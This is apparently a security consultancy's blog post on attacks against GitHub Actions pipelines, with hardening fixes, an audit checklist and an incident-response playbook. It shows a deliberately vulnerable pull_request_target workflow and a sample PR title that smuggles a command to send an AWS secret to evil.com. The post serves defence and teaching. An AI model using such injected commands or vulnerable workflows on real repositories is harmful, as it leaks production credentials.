GitHub Actions: How Pull Requests Exfiltrate Your Production Secrets
GitHub Actions is one of the most over-privileged, under-hardened CI/CD platforms in production. A malicious pull request against a public repo with the wrong workflow configuration can exfiltrate every secret in your GitHub organization: production AWS keys, Stripe tokens, private repo access, everything. Below: the specific attack patterns, the fixes, and the hardening checklist every engineering team should have.
Founder of Valtik Studios. Pentester. Based in Connecticut, serving US mid-market.
Why GitHub Actions is the weakest link in most CI/CD pipelines
GitHub Actions is used by most open source projects and a huge share of commercial engineering teams. It's free, integrated with GitHub, and convenient. It's also the source of multiple catastrophic security incidents over the last few years and, in our audit experience, the single most under-hardened part of most organizations' production infrastructure.
The core problem is architectural. GitHub Actions was designed for convenience: pull requests trigger workflows, workflows run arbitrary code, arbitrary code has access to secrets. Each of those design choices is individually defensible. Combined, they create a system where a single misconfigured workflow can hand your production credentials to anyone who submits a pull request.
This post walks through the specific attack patterns we find on virtually every engineering team's CI/CD audit, why they persist despite being well-known, and the hardening checklist that prevents them.
If your organization uses GitHub Actions, and especially if you have public repositories, at least half of these apply to you.
The attack surfaces
Attack 1: pull_request_target with code checkout
The nuclear option. The pull_request_target trigger is a GitHub Actions event that runs workflows in the context of the base repository with access to secrets, even for pull requests from external forks. It was designed for workflows that need to do things like comment on PRs or trigger automated reviews.
The trap: if a workflow using pull_request_target also checks out the PR's code and executes anything from it, that code now has access to every secret in your repository.
The vulnerable pattern:
```yaml
on:
  pull_request_target:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}  # checks out PR code
      - run: npm install  # runs package.json scripts from PR
      - run: npm test     # runs test code from PR
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          STRIPE_SECRET_KEY: ${{ secrets.STRIPE_SECRET_KEY }}
```
An attacker submits a pull request that:
1. Modifies `package.json` to add a `postinstall` script
2. The `postinstall` script runs at `npm install`
3. The script exfiltrates `$AWS_SECRET_ACCESS_KEY`, `$STRIPE_SECRET_KEY`, and everything else in the environment
Or more subtly:
- Adds a test file that reads environment variables and exfiltrates them to a webhook
- The workflow runs `npm test`, the malicious test runs, secrets leak
The attacker doesn't need commit access. They only need to be able to submit a pull request, which GitHub allows by default for anyone with a GitHub account.
Real-world impact: this exact pattern has been exploited against multiple open source projects and some commercial repos with public visibility. In 2022, Travis CI had a similar class of issue that leaked secrets from 770+ public repositories. GitHub Actions has had its own versions. The pull_request_target class of bug has been exploited repeatedly.
The fix:
- Never check out PR code in a `pull_request_target` workflow
- If you must, use `permissions: read-all` and don't set up secrets in that workflow
- For testing PR code, use `pull_request` (not `pull_request_target`). That trigger doesn't have access to secrets for external PRs by default
- If you need BOTH PR code testing AND some secrets access, split into two workflows:
  - A `pull_request` workflow tests the code without secrets
  - A separate `pull_request_target` workflow does only the things that need secrets and never touches PR code
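The split can be sketched like this. File names are illustrative, and `actions/labeler` stands in for whatever metadata-only automation you run with secrets access:

```yaml
# .github/workflows/pr-test.yml — runs PR code, sees no secrets
on:
  pull_request:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4  # pin to a full SHA in practice
      - run: npm ci && npm test    # untrusted code, but no secrets in scope

---
# .github/workflows/pr-label.yml — privileged, never checks out PR code
on:
  pull_request_target:

jobs:
  label:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write
    steps:
      - uses: actions/labeler@v5   # operates on PR metadata only, no checkout
```

The invariant that matters: the privileged workflow contains no `actions/checkout` of the PR head and executes nothing derived from the PR.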
Attack 2: Compromised third-party actions
Most GitHub Actions workflows use third-party actions from the GitHub Marketplace. A typical workflow might reference:
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
- uses: some-vendor/some-action@v1
- uses: another-org/another-action@v2
Each of those is code written by someone else, running inside your workflow with access to your workflow's environment. Including secrets.
The compromise vectors:
Compromised maintainer. If a third-party action's maintainer's GitHub account is compromised (credential phishing, session theft, lost hardware with active GitHub sessions), the attacker can publish a malicious new version. Users who pull @v1 or @v2 or @latest automatically get the malicious version on next run.
Compromised upstream dependencies. The action itself has its own dependencies: npm packages, Python packages, Go modules. A supply chain attack on those dependencies (like the 2026 Axios incident) propagates to every workflow using the action.
Deliberately malicious actions. Some actions have been specifically published as trojans, designed to look useful but exfiltrate secrets on install.
Notable incidents:
- 2021: `pull-request-action` compromise. A popular action had its maintainer's account compromised and a malicious version published. Secrets were exfiltrated from many users' workflows.
- 2025: `tj-actions/changed-files` incident. A supply chain attack on this widely used action injected a payload that dumped CI secrets into build logs across thousands of repositories.
- 2024: multiple typo-squatting actions published that mimicked popular action names with single-character differences.
The fix:
- Pin to full SHA, not tags. `uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29` instead of `@v4`. SHAs can't be moved. Tags can.
- Minimize third-party action use. Every third-party action is a trust decision.
- Review third-party actions you depend on. Read the source. Check maintainer history. Verify signing where available.
- Use Dependabot for GitHub Actions updates. It proposes pinned-SHA updates with changelog visibility so you can review upstream changes.
- Use OIDC-based credentials instead of static secrets (see Attack 4) so even a compromised action has limited blast radius.
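Dependabot's Actions updates are enabled with a small config file checked into the repo. A minimal sketch:

```yaml
# .github/dependabot.yml
version: 2
updates:
  # watch every action referenced in .github/workflows/ and propose
  # version bumps as pull requests (pinned-SHA updates included)
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
```

With SHA-pinned `uses:` lines, these PRs become your review point for upstream action changes instead of silently pulling a moved tag.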
Attack 3: Workflow injection via PR metadata
Workflow authors sometimes use expressions like ${{ github.event.pull_request.title }} directly in shell commands. PR titles and descriptions are attacker-controlled.
The vulnerable pattern:
```yaml
steps:
  - name: Log PR title
    run: echo "PR title is ${{ github.event.pull_request.title }}"
```
An attacker submits a PR with title:

```
Fix bug"; curl evil.com/exfil?secret=$AWS_SECRET_ACCESS_KEY; echo "
```

The shell interpolation becomes:

```
echo "PR title is Fix bug"; curl evil.com/exfil?secret=$AWS_SECRET_ACCESS_KEY; echo ""
```
The attacker's command runs with full workflow environment access.
Common vulnerable interpolations:
- `github.event.pull_request.title`
- `github.event.pull_request.body`
- `github.event.issue.title`
- `github.event.issue.body`
- `github.event.comment.body`
- `github.head_ref` (branch names can contain shell metacharacters)
- `github.event.commits[].message` (commit messages too)
The fix:
- Use environment variables to pass untrusted data:

```yaml
steps:
  - name: Log PR title
    env:
      PR_TITLE: ${{ github.event.pull_request.title }}
    run: echo "PR title is $PR_TITLE"
```

Here `$PR_TITLE` is a shell variable, and shell quoting rules prevent injection.
- Enable CodeQL's built-in scan for GitHub Actions injection issues in repo settings.
- Static analysis tools like Poutine or Checkov for GitHub Actions catch these patterns.
Attack 4: Overly-scoped secrets
Most teams store all secrets at the organization level with broad access:
- `AWS_ACCESS_KEY_ID` → available to every workflow in every repo
- `STRIPE_SECRET_KEY` → available to every workflow in every repo
- `DATABASE_URL` → available to every workflow in every repo
If any one workflow is compromised, all secrets leak.
The fix: environment-scoped secrets.
GitHub Actions supports secrets scoped to deployment environments. Each environment (production, staging, preview) can have its own secrets, its own protection rules, its own required reviewers.
```yaml
jobs:
  deploy:
    environment: production  # requires protection rules
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@<SHA>
      - run: aws s3 cp ...
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}  # pulls from prod env
```
Protection rules for the environment:
- Required reviewers. Deployment can't proceed without approval.
- Wait timer. Deployment delayed by X minutes for monitoring.
- Deployment branches. Only specific branches can deploy.
- Protected secrets. These secrets are unavailable to any other workflow.
With environment-scoped secrets, a compromised PR workflow doesn't have production AWS access.
Better still: OIDC-based credentials.
Instead of storing long-lived AWS access keys in GitHub Secrets, use OIDC federation. GitHub Actions has a built-in OIDC token issuer. AWS (and GCP, Azure) can trust GitHub's OIDC and issue short-lived credentials to specific repositories, branches, or environments.
```yaml
jobs:
  deploy:
    permissions:
      id-token: write
      contents: read
    steps:
      - uses: aws-actions/configure-aws-credentials@<SHA>
        with:
          role-to-assume: arn:aws:iam::123456789012:role/deploy-role
          aws-region: us-east-1
```
No static AWS credentials stored in GitHub at all. Each run gets a short-lived credential specific to this workflow + this branch + this run ID. If leaked, the blast radius is limited to the single run.
Attack 5: Self-hosted runner compromise
Self-hosted runners are GitHub Actions runners you operate yourself. Often on corporate infrastructure with access to internal resources unreachable from GitHub's hosted runners.
The trap: self-hosted runners are shared across workflows. If a public repo uses a self-hosted runner, any pull request that triggers a workflow can execute arbitrary code on your runner. If the runner has access to internal systems, the attacker now has access to internal systems.
Worse: runner persistence. GitHub's default self-hosted runner keeps state between jobs. An attacker who runs code on your runner in job 1 can install persistence (modify PATH, install a backdoor, inject into subsequent jobs). The next legitimate deploy using that runner picks up the backdoor.
The fix:
- Never use self-hosted runners for public repositories. GitHub's documentation says this. Teams ignore it. Don't.
- Use ephemeral runners. GitHub Actions supports ephemeral (one-job) runners that destroy themselves after each job. Use this for all self-hosted runners.
- Isolate runners by sensitivity. Separate runner pools for public repos, internal repos, and production-deployment repos. Access controls by runner label.
- Use Actions Runner Controller (ARC) or similar for auto-scaling ephemeral runners.
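The isolation point can be enforced at the job level with runner labels. The label names here are illustrative, not a GitHub convention:

```yaml
jobs:
  deploy:
    # route to an ephemeral pool reserved for production-deploy repos;
    # never attach this pool to workflows triggerable from public forks
    runs-on: [self-hosted, ephemeral, prod-deploy-pool]
```

Pair the labels with org-level runner-group access controls so a public repo can't simply claim the label and land on the sensitive pool.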
Attack 6: GITHUB_TOKEN over-scoping
Every GitHub Actions workflow gets a GITHUB_TOKEN with permissions on the repository. By default, this token has broad write access.
Malicious code running in a workflow (via any of the above attack paths) can use GITHUB_TOKEN to:
- Push commits to branches
- Create / merge pull requests
- Modify GitHub Actions workflow files themselves (establishing persistence)
- Read/write repo contents
- Trigger additional workflows
- Access other repositories if the token has org-level access
The fix:
- Set default permissions to the minimum: `contents: read`
- Elevate per-job only when needed
```yaml
# Repository-level default
permissions:
  contents: read

jobs:
  test:
    # inherits contents: read
    ...
  deploy:
    permissions:
      contents: read
      id-token: write  # for OIDC
    ...
  release:
    permissions:
      contents: write  # needs to tag
      pull-requests: write
    ...
```
Lock down the org-level default too: Organization → Settings → Actions → "Workflow permissions" → "Read repository contents permission".
Attack 7: Cache poisoning
GitHub Actions has a caching system (actions/cache). Caches are scoped to the repository and branch, but workflow runs can also restore entries created on their base or default branch.
Attack:
1. Attacker submits a PR (or compromises a workflow) that populates the cache with malicious content: a poisoned `node_modules` directory, compromised build tools, etc.
2. The cache entry survives beyond the PR.
3. The next legitimate workflow that restores the cache pulls the poisoned content.
This has been demonstrated in research and has been exploited in at least one public incident.
The fix:
- Scope caches narrowly (specific paths, specific cache keys)
- Disable cache restoration for sensitive workflows
- Rotate cache keys regularly
- Monitor cache hits for unexpected patterns
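One concrete way to narrow cache keys is to bind them to a lockfile hash, so an entry built under a different dependency set never matches a clean build. A sketch using `actions/cache`:

```yaml
- uses: actions/cache@v4  # pin to a full SHA in practice
  with:
    path: ~/.npm
    # key includes OS and the lockfile hash; deliberately no broad
    # restore-keys fallback, which is what lets stale or poisoned
    # entries partial-match into unrelated builds
    key: npm-${{ runner.os }}-${{ hashFiles('**/package-lock.json') }}
```

The trade-off is more cache misses; for deploy and release workflows, prefer the miss.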
The audit checklist
If you're auditing a GitHub Actions setup, work through this list:
Workflow triggers
- Any workflow using `pull_request_target`? → verify it doesn't check out or execute PR code
- Any workflow using `workflow_run`? → verify it doesn't trust arbitrary data from the triggering workflow
- Any workflow using `issue_comment`? → verify it doesn't execute based on unrestricted commenter input
Third-party actions
- All `uses:` statements pinned to full SHA (not tags)?
- Dependabot enabled for GitHub Actions updates?
- Review of third-party actions' maintainer history?
Data injection
- Any `${{ ... }}` expressions directly in `run:` commands that reference attacker-controllable data?
- CodeQL enabled for GitHub Actions?
Secrets
- Secrets scoped to environments where appropriate?
- Environment protection rules (required reviewers, deployment branches) configured for production?
- OIDC federation used for cloud providers instead of long-lived keys?
- Any secrets that should be rotated?
GITHUB_TOKEN
- Default permissions set to minimum?
- Each workflow elevates only the specific permissions needed?
Self-hosted runners
- Public repos use GitHub-hosted runners only?
- Self-hosted runners are ephemeral?
- Runner pools isolated by sensitivity?
Cache
- Cache keys narrowly scoped?
- Sensitive workflows opt out of cache restoration?
Tooling that helps
- Poutine. Static analysis for GitHub Actions security issues
- Checkov. Has GitHub Actions rules
- CodeQL. Built into GitHub, detects Actions injection patterns
- GitHub's own Dependabot. Keeps action versions current
- zizmor. Specialized GitHub Actions security auditor
- StepSecurity Harden-Runner. Runtime protection for workflows
- GitHub Actions Runner Controller for Kubernetes-based ephemeral runners
The incident response playbook
If you discover a GitHub Actions compromise:
1. Rotate every secret. Every secret in every environment in every repo in your org. Assume the attacker has exfiltrated everything. This is the most time-consuming part of recovery.
2. Review audit logs. GitHub's audit log shows workflow runs, secret modifications, and access patterns. Search for anomalies in the window of suspected compromise.
3. Check for workflow modifications. The attacker may have modified workflow files to establish persistence. Review all .github/workflows/*.yml changes in the affected repos.
4. Check for cache persistence. Purge all caches in affected repos.
5. Review all recent pull requests. The attack vector may be a malicious PR that triggered the initial compromise. Identify it.
6. Review cross-repo impact. Did the compromised workflow have access to other repos via GITHUB_TOKEN org-level permissions? Trace the scope.
7. Incident disclosure. If customer data or production infrastructure was accessible, your breach disclosure obligations are triggered.
For Valtik clients
Valtik's CI/CD security audits include GitHub Actions review as a core component:
- Workflow security audit. Every workflow reviewed against the attack patterns above
- Secrets architecture review. Environment scoping, OIDC federation readiness, rotation strategy
- Third-party action risk assessment. Dependencies ranked by trust, SHA pinning verification
- Runner infrastructure review. Self-hosted runner security if applicable
- Incident response playbook. Specific to your GitHub Actions stack
If you run GitHub Actions in production, and especially if you have any public repositories, odds are at least three of the patterns above are live right now. The cost of finding them before they're exploited is dramatically lower than the cost of post-incident remediation.
Reach out via https://valtikstudios.com.
Sources
- GitHub Actions Security Documentation
- pull_request_target Security Warning. GitHub Blog
- GitHub Actions Workflow Injection. GitHub Blog
- OIDC Authentication with AWS. GitHub Docs
- tj-actions/changed-files Incident Analysis
- CodeQL Actions Security Queries
- Poutine GitHub Actions Security Scanner
- StepSecurity GitHub Actions Hardening
- NIST SP 800-204D (Strategies for Software Supply Chain Security)
- SLSA. Supply Chain Levels for Software Artifacts
Want us to check your CI/CD setup?
Our scanner detects this exact misconfiguration, plus dozens more across 38 platforms. A free website check is available, no commitment required.
